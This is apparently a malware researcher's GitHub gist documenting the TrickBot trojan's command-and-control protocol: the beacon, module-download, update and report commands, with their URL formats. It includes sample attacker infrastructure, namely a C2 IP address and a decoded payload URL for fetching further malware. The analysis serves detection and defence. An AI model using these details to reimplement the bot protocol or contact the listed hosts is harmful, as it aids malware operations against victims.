-
-
Save hasherezade/88837ea728d3950c7c38160d016ea6cf to your computer and use it in GitHub Desktop.
TrickBot protocol (work in progress)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Full list of implemented commands: | |
0 | |
1 | |
5 | |
10 | |
14 | |
23 | |
25 | |
63 | |
=========== | |
Command: 0 | |
=========== | |
Meaning: Beacon | |
Req: | |
/[group_id]/[client_id]/0/[windows version]/[system language id]/[ip]/[sha256 uppercase string]/[session key]/ | |
Possible responses after beacon: | |
Resp 1: | |
eventually: with additional configuration | |
---- | |
/1/[group_id]/[client_id]/[session key]/288/ | |
[encrypted] | |
123456789 | |
encrypted - example: | |
<servconf> | |
<expir>1480550400</expir> | |
<plugins> | |
<psrv>80.79.114.179:443</psrv> | |
</plugins> | |
</servconf> | |
---- | |
Resp: 42 | |
Meaning - download a new, independent malware | |
/42/[group_id]/[client_id]/[session key]/35265/ | |
[base64data] | |
123456789 | |
example: | |
base64data: | |
AAAAABITWmON7YmzLzAoFn2jj0looA8XxcYfqQte5O1dab8lJgAAAGgAdAB0AHAA OgAvAC8AMQA1ADYAMQA2AC4AbQBlAHIAYQBoAG8AcwB0AC4AcgB1AC8AOAA1ADEA MwAyADEAMwA2ADUALgBiAGkAbgCT/OBixlv7jD/hi/8w9D3I9LCYf93qh72eEiPo vmcQCB8uL8nz4b9Oqja3omAflv5xR8TDnus4djX37duvEaMHhmxqIlrDcG5DtlIp FG9IsZSitDDFhRsGsQuoI9Vtwls= | |
decoded: | |
00000000 00 00 00 00 - (padding?) |.... | |
12 13 5a 63 8d ed 89 b3 2f 30 28 16 | ..Zc..../0(.| | |
00000010 7d a3 8f 49 68 a0 0f 17 c5 c6 1f a9 0b 5e e4 ed |}..Ih........^..| | |
00000020 5d 69 bf 25 - sha256 |]i.% | |
26 00 00 00 - URL length | &... | |
68 00 74 00 74 00 70 00 | h.t.t.p.| | |
00000030 3a 00 2f 00 2f 00 31 00 35 00 36 00 31 00 36 00 |:././.1.5.6.1.6.| | |
00000040 2e 00 6d 00 65 00 72 00 61 00 68 00 6f 00 73 00 |..m.e.r.a.h.o.s.| | |
00000050 74 00 2e 00 72 00 75 00 2f 00 38 00 35 00 31 00 |t...r.u./.8.5.1.| | |
00000060 33 00 32 00 31 00 33 00 36 00 35 00 2e 00 62 00 |3.2.1.3.6.5...b.| | |
00000070 69 00 6e 00 - URL |i.n. | |
93 fc e0 62 c6 5b fb 8c 3f e1 8b ff | ...b.[..?...| | |
00000080 30 f4 3d c8 f4 b0 98 7f dd ea 87 bd 9e 12 23 e8 |0.=...........#.| | |
00000090 be 67 10 08 1f 2e 2f c9 f3 e1 bf 4e aa 36 b7 a2 |.g..../....N.6..| | |
000000a0 60 1f 96 fe 71 47 c4 c3 9e eb 38 76 35 f7 ed db |`...qG....8v5...| | |
000000b0 af 11 a3 07 86 6c 6a 22 5a c3 70 6e 43 b6 52 29 |.....lj"Z.pnC.R)| | |
000000c0 14 6f 48 b1 94 a2 b4 30 c5 85 1b 06 b1 0b a8 23 |.oH....0.......#| | |
000000d0 d5 6d c2 5b - signature |.m.[| | |
=========== | |
Command: 1 | |
=========== | |
Meaning: Keep alive | |
Req: | |
/[group_id]/[client_id]/1/[session key]/ | |
Resp: | |
/1/ | |
=========== | |
Command: 5 | |
=========== | |
Meaning: Download module/module config | |
Req: | |
/[group_id]/[client_id]/5/[module/config name]/ | |
Examples: | |
/[group_id]/[client_id]/5/spk/ | |
/[group_id]/[client_id]/5/dinj/ | |
/[group_id]/[client_id]/5/sinj/ | |
/[group_id]/[client_id]/5/dpost/ | |
/[group_id]/[client_id]/5/systeminfo32/ | |
/[group_id]/[client_id]/5/injectDll32/ | |
Resp: | |
[AES encrypted data - requested module] | |
=========== | |
Command: 10 | |
=========== | |
Meaning: start module info? | |
Req: | |
/[group_id]/[client_id]/10/62/[session key]/1/ | |
* Example: | |
/[group_id]/[client_id]/10/62/HIZQJUXGMUJXATGQT/1/ | |
Resp: [None] | |
=========== | |
Command: 14 | |
=========== | |
Meaning: Additional info/checks | |
Req: | |
/[group_id]/[client_id]/14/[key]/[value]/0/ | |
*Examples: | |
user info: | |
/[group_id]/[client_id]/14/user/[username]/0/ | |
is DNS blacklisted? | |
/[group_id]/[client_id]/14/DNSBL/listed/0/ | |
/[group_id]/[client_id]/14/DNSBL/not%20listed/0/ | |
Resp: | |
[None] | |
=========== | |
Command: 23 | |
=========== | |
Meaning: Compare my config version with the current version: | |
Req: | |
/[group_id]/[client_id]/23/[config ver]/ | |
* Example: | |
/[group_id]/[client_id]/23/1000002/ | |
Resp: | |
-if update available: | |
/23/[group_id]/[client_id]/1000003/704/ | |
[encrypted] | |
1234567890 | |
encrypted: | |
updated config content | |
-if no update: | |
[None] | |
=========== | |
Command: 25 | |
=========== | |
Meaning: Check bot update | |
/[group_id]/[client_id]/25/[session key]/ | |
Resp: | |
-if update available: | |
/25/[group_id]/[client_id]/[session key]/ | |
[link to the updated bot] | |
123456789 | |
[Bot updates itself, downloading a new version from the given url...] | |
-if no update: | |
[None] | |
=========== | |
Command 63 | |
=========== | |
Meaning: Module report | |
Req: | |
/[group_id]/[client_id]/63/[module name]/[module command]/[result - base64]/[root tag of output XML]/ | |
* Example: | |
/[group_id]/[client_id]/63/systeminfo/start/(null)// | |
* Example: | |
/[group_id]/[client_id]/63/systeminfo/GetSystemInfo/c3VjY2Vzcw==/systeminfo/ | |
c3VjY2Vzcw== -> Base64("success") | |
Content-Type: multipart/form-data; boundary=------Boundary[random id] | |
[posting list of running processes and installed programs:] | |
--------Boundary[random id] | |
Content-Disposition: form-data; name="noname" | |
<systeminfo>[...]</systeminfo> | |
--------Boundary[random id]-- | |
* Example: | |
/[group_id]/[client_id]/63/injectDll/start/U3VjY2Vzcw==// | |
U3VjY2Vzcw== -> Base64("Success") | |
Resp: | |
[None] |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment